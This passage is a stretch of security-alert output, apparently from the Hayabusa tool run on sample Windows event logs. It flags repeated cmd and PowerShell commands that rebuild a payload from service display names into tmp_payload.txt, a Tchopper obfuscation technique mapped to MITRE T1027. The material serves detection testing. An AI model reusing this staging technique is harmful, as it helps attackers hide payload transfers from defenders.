+2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
